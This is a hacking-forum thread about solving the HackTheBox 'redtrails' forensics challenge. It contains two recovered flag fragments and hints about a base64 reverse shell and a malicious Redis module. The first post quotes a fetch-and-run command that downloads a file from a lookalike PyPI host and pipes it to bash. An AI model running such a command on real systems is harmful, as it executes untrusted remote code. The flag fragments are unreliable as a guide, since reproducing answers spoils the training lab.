JOIN BREACHFORUMS TELEGRAM
redtrails forensic challenge
by yolocalman - Sunday August 11, 2024 at 06:49 PM
Breached
Member
Posts: 16
Threads: 2
Joined: Jul 2024
Reputation: 2
#1
Aug 11, 2024, 06:49 PM
I have found the following 2/3 parts of the flag:

_c0uld_0p3n_n3w

HTB{r3d15_1n574nc35

But cant find the final one, I think that it is the output of the command: wget --no-check-certificate -O gezsdSC8i3 'https://files.pypi-install.com/packages/gezsdSC8i3' && bash gezsdSC8i3

Can somebody help me to find the final part?
Reply
Elite User

Posts: 148
Threads: 2
Joined: Oct 2023
Reputation: 25
#2
Aug 11, 2024, 07:58 PM
Yeah, sure. Good job finding the first 2 parts of the flag. Indeed it has three parts.

The first part is in the tcp stream almost at the beginning, bulkstring, array and somewhere around that place.
Second part you found an obfuscated script, which contained a reverse shell in base64. The script needs to be deobfuscated then decrypt the second part is hidden behind the encrypted string.
Third part is the trickiest, yes. Trace the TCP streams, you will find 3 hexadecimal strings which seems like the output of redis. It's a suspicious module with some random name, some gibberish filename.
How do we find this module? Well, it should be something with an elf header, right? Now try disassembling. What do you find? It performs some encryption. How do we reverse this process? Decrypt.
To do so, we need to find the key and the IV. Locate these, reverse the encryption, and if you decrypt the ciphertext you end up with part 3 of the flag.

And that's about it. Good luck.
Reply
Breached
Member
Posts: 16
Threads: 2
Joined: Jul 2024
Reputation: 2
#3
Aug 11, 2024, 09:56 PM (This post was last modified: Aug 11, 2024, 10:16 PM by yolocalman.)
(Aug 11, 2024, 07:58 PM)peRd1 Wrote: Yeah, sure. Good job finding the first 2 parts of the flag. Indeed it has three parts.

The first part is in the tcp stream almost at the beginning, bulkstring, array and somewhere around that place.
Second part you found an obfuscated script, which contained a reverse shell in base64. The script needs to be deobfuscated then decrypt the second part is hidden behind the encrypted string.
Third part is the trickiest, yes. Trace the TCP streams, you will find 3 hexadecimal strings which seems like the output of redis. It's a suspicious module with some random name, some gibberish filename.
How do we find this module? Well, it should be something with an elf header, right? Now try disassembling. What do you find? It performs some encryption. How do we reverse this process? Decrypt.
To do so, we need to find the key and the IV. Locate these, reverse the encryption, and if you decrypt the ciphertext you end up with part 3 of the flag.

And that's about it. Good luck.

Hey perd1 thanks for the reply and the tips! I will give you rep! Smile
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [FREE] CPTS 12 FLAGS pulsebreaker 68 1,886 1 hour ago
Last Post: VictorPipeau
  [FREE] HackTheBox Dante - complete writeup written by Tamarisk Tamarisk 601 91,506 1 hour ago
Last Post: VictorPipeau
  [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired Tamarisk 371 92,785 2 hours ago
Last Post: phannguyenbaouy1
  [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags Techtom 21 2,598 6 hours ago
Last Post: popoler
  Hack the box Pro Labs, VIP, VIP+ 1 month free Method RedBlock 23 2,241 Yesterday, 02:10 PM
Last Post: kkkato

Forum Jump:


 Users browsing this forum: 1 Guest(s)